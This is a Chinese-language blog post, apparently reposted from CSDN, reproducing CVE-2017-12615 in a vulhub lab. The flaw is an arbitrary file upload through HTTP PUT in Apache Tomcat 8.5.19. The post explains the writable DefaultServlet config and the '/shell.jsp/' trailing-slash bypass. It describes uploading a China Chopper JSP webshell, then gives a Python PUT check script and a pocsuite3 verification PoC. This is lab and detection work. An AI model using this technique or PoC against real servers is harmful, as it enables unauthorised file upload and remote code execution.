欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

CVE-2017-12615漏洞复现过程

程序员文章站 2022-03-27 22:25:11
CVE-2017-12615漏洞复现复现环境搭建地址:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615Tomcat版本:8.5.19漏洞原理:tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对上传的文件尾部有检测,所以可以用/来绕过,如 /shell.jsp/源码内容: default

CVE-2017-12615漏洞复现复现

环境搭建地址:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615
Tomcat版本:8.5.19

漏洞原理:
tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对上传的文件尾部有检测,所以可以用/来绕过,如 /shell.jsp/
源码内容:

<servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>listings</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>readonly</param-name> <param-value>false</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> 

readonely设置为了false,说明可以写文件

  1. 提交数据包,burp查看内容
    CVE-2017-12615漏洞复现过程
  2. 在repter模块对提交的数据进行更改,上传菜刀的jsp一句话木马

    CVE-2017-12615漏洞复现过程

    3. 菜刀连接

    CVE-2017-12615漏洞复现过程
    CVE-2017-12615漏洞复现过程


    连接成功

参考链接:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md

关于此漏洞poc的编写,–verify模式

  • 首先要掌握request模块put方法的使用
  • CVE-2017-12615漏洞复现过程

验证模块的思路:

  1. 先用put方法提交一个.txt的文件
  2. 然后用get方法访问这个新的url,读取网页内容,如果状态码为200且写入的txt文本在网页内,说明存在漏洞
    下边是本地windows测试put方法的脚本
import requests


url = 'http://192.168.0.104:8080/' data = "hello world" new_url = url + "tcc.txt" res = requests.put(url=new_url,data=data) respone = requests.get(url=new_url) print(respone.url) print(respone.status_code) if respone.status_code == 200 and "hello world" in respone.text: print(respone.url) print("success") 

最后利用pocsuite3框架,完成编写

from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY import requests class DemoPOC(POCBase): #实现类DemoPoc,继承自POCBase vulID = '1.1' version = '1.1' author = ['1'] vulDate = '1.1' createDate = '2020/10/10' updateDate = '1.1' references = ['tomcat'] name = 'tomcat-poc' appPowerLink = 'tomcat' appName = 'tomcat' appVersion = 'tomcat' vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        tomcat
    ''' #samples = ['96.234.71.117:80'] #category = POC_CATEGORY.EXPLOITS.REMOTE def _verify(self): #验证代码函数 result = {} #result返回结果 path = "/vluhub.txt" url = self.url + path
        payload = "target is vulnerable" res = requests.put(url=url,data=payload) try: respone = requests.get(url=url) if respone.status_code == 200 and "target is vulnerable" in respone.text: result['VerifyInfo'] = {} result['VerifyInfo'] = url
                result['VerifyInfo'] = payload return self.parse_output(result) except Exception as e: return return self.parse_output(result) def _attack(self): #注意:若该poc没有攻击模式,在_attack函数下,return self._verigy(),不用再写_attack() return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output
register_poc(DemoPOC) 

CVE-2017-12615漏洞复现过程

修复

升级tomcat版本

本文地址:https://blog.csdn.net/qq_34640691/article/details/109051748

相关标签: vluhub复现